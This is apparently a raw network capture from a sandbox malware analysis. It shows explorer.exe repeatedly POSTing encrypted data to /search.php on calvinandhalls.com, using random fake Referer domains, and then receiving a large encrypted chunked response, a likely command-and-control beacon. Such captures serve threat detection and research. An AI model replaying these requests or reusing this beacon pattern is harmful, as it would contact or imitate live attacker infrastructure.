                                                                                                                            2024-10-03 00:53:20 UTC285OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 42 bb 3a a7 b7 f8 30 58 d6 65 21 b2 35 94 9d 11 1d fc 13 26 70 af ba d6 68 b0 c1 53 6e e4 fc 38 ab 3d 3e a4 c1 0b 2f 55 0d 2c 32 ca 03 b2 c8 8c 2f dd a6 33 10 2d f5 6e 49 cf 49 03 e9 82 8e db 56 32 b8 0a ca 32 b9 60 6a d8 51 b9 30 20 2a 25 11 f3 e7 4b a7 cf 6d d3 55 6f ca e6 92 13 c1 fc 59 bc ae ee 8c 0d 2b c2 c3 d2 67 51 90 4f 39 96 29 57 37 e4 3d 26 57 d3 50 69 06 eb b2 8b 1c 6a c7 e6 72 bf 53 86 c5 a0 63 11 07 66 cb 6f 3d 4a 33 34 b5 2e fd d5 6f 11 20 5e 2a 8c b5 72 5f 09 55 85 c6 c9 15 f3 f8 29 e7 2d 82 e4 d7 b0 17 c9 45
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lh4%<B:0Xe!5&phSn8=>/U,2/3-nIIV22`jQ0 *%KmUoY+gQO9)W7=&WPijrScfo=J34.o ^*r_U)-E
                                                                                                                            2024-10-03 00:53:20 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:20 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.44977223.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:21 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://ewclkpfbrsdjk.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 252
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:21 UTC252OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 62 ca 62 fb 98 b7 5e 59 c6 0f 1a 99 58 9b 94 2a 18 ca 13 36 22 88 cc d6 44 d2 b4 12 03 8c f0 2c 90 4e 3a e8 d5 0a 7b 59 1f 3d 3d dc 12 aa ee d3 04 ff e7 75 0d 20 82 08 08 d4 49 68 90 f6 97 c0 46 6c bf 78 c8 3f af 73 3d b9 3f cb 7a 23 3b 10 64 d4 e3 68 fc a6 28 d8 0e 73 86 e1 95 4e da 81 78 b9 9e 96 d5 33 37 ae dc c9 50 41 c4 76 26 db 0a 03 24 9f 45 68 5f cd 54 19 2e db a0 e2 7f 51 80 f8 0f 9d 7c f8 c6 c8 1b 00 01 22 c3 1a 0d 57 5a 16 b8 5a ed c8 26 14 1f 7b 1e e3 92 67 79 08 5a c5 84 fb 41 cd bf 1e e6 44 a8 ea b8 f1
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Li4%<bb^YX*6"D,N:{Y==u IhFlx?s=?z#;dh(sNx37PAv&$Eh_T.Q|"WZZ&{gyZAD
                                                                                                                            2024-10-03 00:53:21 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:21 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.44977323.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:22 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://uiidyxwxtxdyi.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 188
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:22 UTC188OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 33 d1 65 a3 b8 cd 3d 15 f6 60 7d 84 69 dc 93 64 61 fc 05 0c 62 af e4 f0 23 da a5 73 5f f0 87 63 8d 36 25 96 ee 1a 1b 36 55 31 3b d8 1b a4 91 d2 35 c9 b7 46 35 28 ee 57 0b a1 2d 6c dd ec af bf 49 78 c6 0e bf 23 ec 0f 66 c5 31 c4 3d 7b 24 2f 48 d0 db 07 b3 a7 1f 86 43 69 d2 c3 be 54 da ef 64 81 b1 ab 86 0b 54 c7 c3 cb 79 50 9a 3b
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Ln4%<3e=`}idab#s_c6%6U1;5F5(W-lIx#f1={$/HCiTdTyP;
                                                                                                                            2024-10-03 00:53:22 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:22 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.44977423.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:23 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://uoltcvkhemeklfe.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 328
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:23 UTC328OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 55 a9 1a e8 d8 c0 11 25 c6 77 23 b5 75 fa cc 71 76 c0 39 3f 39 c1 bb fc 23 ac e9 1e 4f 8b 9d 2b 8b 43 4b ad ee 57 31 39 6e 50 3b c2 18 97 db 9d 2e eb e3 49 0d 1d 8d 16 39 dd 4a 66 d7 ea e0 d7 2a 26 d2 15 cf 67 8c 35 5a be 3f dc 3a 3e 4f 78 47 a5 af 16 fb ca 72 de 02 68 c3 a6 ba 0a b3 f2 7f 92 ca b0 b5 05 30 c9 d5 92 6b 49 93 49 4d 8e 36 6b 38 b7 7b 15 54 a5 4f 17 18 9c d4 c2 70 6e d8 ac 21 fc 76 ec af bf 33 17 1b 5a dc 63 76 63 1f 0c aa 4c 8d 9d 72 11 26 2c 3a fe 87 39 6e 1d 2c ba 96 c8 4b e8 f3 0c eb 63 9f e4 d0 c7 00 b8 47
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lo4%<U%w#uqv9?9#O+CKW19nP;.I9Jf*&g5Z?:>OxGrh0kIIM6k8{TOpn!v3ZcvcLr&,:9n,KcG
                                                                                                                            2024-10-03 00:53:23 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:23 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.44977523.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:24 UTC290OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://ncagifvdvfuwwfnn.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 124
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:24 UTC124OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 56 aa 19 96 be f4 04 17 c4 0c 72 b4 25 d2 8f 79 05 c8 0b 3a 73 af c8 c2 33 bb d8 4d 5e f2 e9 57 e7 53 20 ec c1 09 08 4e 66 39 5c 89 13 f8
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Ll4%<Vr%y:s3M^WS Nf9\
                                                                                                                            2024-10-03 00:53:24 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:24 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.44977623.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:25 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://wwdeekjiqyviexo.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 249
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:25 UTC249OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 50 ca 7b 84 ca aa 3f 12 a1 6e 18 f8 3e 9e c6 04 21 b3 0b 50 5d d1 df d2 20 e9 cf 7e 08 f8 b4 30 87 56 56 f6 e9 0d 28 3e 1d 40 1c fb 06 c0 9e be 10 e1 f4 6d 66 40 a8 57 2d e6 3b 0d 87 8f e2 cf 2d 64 86 6d d4 4d a1 0d 43 b0 20 d4 55 51 32 7c 15 c4 e3 1f e1 c5 37 cb 0c 3a 83 d2 db 04 c4 e8 6a 82 c9 e7 91 45 71 af de d9 1a 17 c1 4f 1a c9 0b 42 4f 90 7f 61 36 af 16 33 51 c6 ae 86 10 7d c0 e9 7d e1 55 cf c7 be 6b 73 61 27 f8 7b 04 79 3c 6e a7 51 9f 91 26 4d 64 72 59 81 e3 6e 3c 30 1f d8 f0 87 4f 82 b2 04 cf 4f e6
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lm4%<P{?n>!P] ~0VV(>@mf@W-;-dmMC UQ2|7:jEqOBOa63Q}}Uksa'{y<nQ&MdrYn<0OO
                                                                                                                            2024-10-03 00:53:25 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:25 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.44977723.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:26 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://kosstmcfnhuhw.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 237
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:26 UTC237OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 75 d9 08 8e aa c5 54 0f c3 7a 00 89 5f e4 e2 28 67 d5 1a 51 3b dc e5 d6 29 a6 fc 79 08 84 a1 6b bb 61 3d ba fa 62 38 44 1d 0f 0b 8f 0a c6 e9 aa 28 fc e9 4c 14 2a a7 6a 02 cf 58 4b d7 fa 88 d4 5f 08 c9 14 d8 49 9d 0d 4a 9f 2f ba 44 24 42 28 7c f7 da 0f f0 92 64 99 11 2a e3 cc cd 52 e8 9f 68 ee b3 a1 ad 42 64 ab 8f de 11 22 9b 62 54 8e 02 76 2e a0 7f 35 53 d3 06 24 2b d6 b4 df 1d 60 9f be 0e f7 77 ca e4 ef 7e 23 76 6f a9 5a 64 6e 09 03 c9 20 ef db 15 52 28 5a 16 db 85 73 0e
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lb4%<uTz_(gQ;)yka=b8D(L*jXK_IJ/D$B(|d*RhBd"bTv.5S$+`w~#voZdn R(Zs
                                                                                                                            2024-10-03 00:53:26 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:26 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.44977823.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:27 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://ydofwygotpmmcts.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 116
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:27 UTC116OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 4e c9 18 ff ce eb 3f 20 d5 0d 33 fb 3e 9a f7 3d 06 c3 70 37 4e b7 fa c7 35 d3 fa 10 55 98 b8 72 98 58 59 e1 99 3f
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lc4%<N? 3>=p7N5UrXY?
                                                                                                                            2024-10-03 00:53:27 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:27 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.44977923.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:28 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://nojnvrwehyneiu.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 219
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:28 UTC219OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 60 34 01 83 b7 25 93 3c 2e ce 2a e4 8e f4 4e 27 fd 6d 30 b9 40 c3 c9 65 20 ae 2f 38 63 a2 d1 94 50 f3 fb 6e 18 e7 e5 32 fa 21 56 f1 c6 79 18 2f 64 28 2a fb 6f bb 9f ad 1d cb 98 5f 10 45 e4 16 54 d5 2c 1c ec e1 93 b7 1c 30 88 59 d3 42 f3 03 7d ce 48 ca 6d 5a 6a 02 63 a9 c2 66 eb b3 74 f2 5e 15 ea d0 b7 57 ea 81 74 85 a6 aa cf 1a 21 df ae 80 7e 05 ba 5a 41 cf 2d 7c 09 ba 4c 60 21 ff 2a 29 13 e4 cf 89 64 39 c2 aa 30 bd 62 88 b8 fd 28 1a 2c 7f 97
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@L`4%<.*N'm0@e /8cPn2!Vy/d(*o_ET,0YB}HmZjcft^Wt!~ZA-|L`!*)d90b(,
                                                                                                                            2024-10-03 00:53:28 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:28 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.44978023.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:29 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://qnsgnjmmwemj.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 212
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:29 UTC212OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 61 34 01 83 b7 25 93 3c 67 c2 15 90 82 be 08 11 ee 34 06 ee 3e ea 84 31 2c c4 13 16 33 d7 a4 ee 32 b7 b6 00 78 ea 9f 57 e6 34 4f a6 dc 4a 15 4c 4a 05 3d 9a 6a 9b f2 a3 48 cf 8a 49 0b 56 ac 1f 3c f6 21 77 cd e5 e9 ac 46 37 ce 54 da 7d 82 65 21 b3 4f a8 4a 68 78 76 19 ab e4 12 f3 c7 1f e2 32 3c e3 d3 9c 4a bd ef 6b e6 94 8a c2 32 66 9f a4 aa 4c 47 8b 64 4d e7 05 12 0d a2 3f 10 7e aa 39 67 3b fd 96 98 2f 56 bb b9 1f a5 48 aa
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@La4%<g4>1,32xW4OJLJ=jHIV<!wF7T}e!OJhxv2<Jk2fLGdM?~9g;/VH
                                                                                                                            2024-10-03 00:53:29 UTC278INHTTP/1.1 200 OK
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:29 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Length: 0
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.44978123.145.40.1624432580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-03 00:53:29 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: https://wehtacgjvfsaxou.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 240
                                                                                                                            Host: calvinandhalls.com
                                                                                                                            2024-10-03 00:53:29 UTC240OUTData Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 66 34 01 83 b7 25 93 3c 4a fc 3f 80 b6 ab 29 5a fd 73 32 87 4e f6 fa 35 0c e3 10 15 50 c0 e0 f3 5f d6 ff 59 47 8c 96 40 b2 70 3a ef e1 4f 3d 74 73 5a 5b c7 18 d5 ef ba 26 c1 9d 7d 35 24 9f 5b 20 ef 59 5f ce ca 97 c4 39 34 81 5d e2 7a b9 33 24 b5 3b ba 2f 79 59 6b 65 b8 ab 16 9b b2 7e dd 50 68 99 b8 8e 3b cd bf 0a fb b8 ef a5 44 74 b3 bb ab 08 55 de 5c 3b 98 11 49 5e be 2f 17 48 ad 50 76 30 f7 93 ef 75 27 9c c9 7f b4 53 80 fa d4 0b 06 78 51 aa 68 6a 15 21 3b bc 06 bb 80 16 54 0e 72 05 d0 9e 7b 55 5a 33 ff
                                                                                                                            Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lf4%<J?)Zs2N5P_YG@p:O=tsZ[&}5$[ Y_94]z3$;/yYke~Ph;DtU\;I^/HPv0u'SxQhj!;Tr{UZ3
                                                                                                                            2024-10-03 00:53:30 UTC294INHTTP/1.1 404 Not Found
                                                                                                                            Date: Thu, 03 Oct 2024 00:53:30 GMT
                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            2024-10-03 00:53:30 UTC7898INData Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 88 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                                                                            Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU44A:F=
                                                                                                                            2024-10-03 00:53:30 UTC19INData Raw: 1a 58 b2 14 d1 ff ef 1b ab d4 44 9e af 19 24 1b 3c de a6
                                                                                                                            Data Ascii: XD$<
                                                                                                                            2024-10-03 00:53:30 UTC2INData Raw: 0d 0a
                                                                                                                            Data Ascii:
                                                                                                                            2024-10-03 00:53:30 UTC8192INData Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
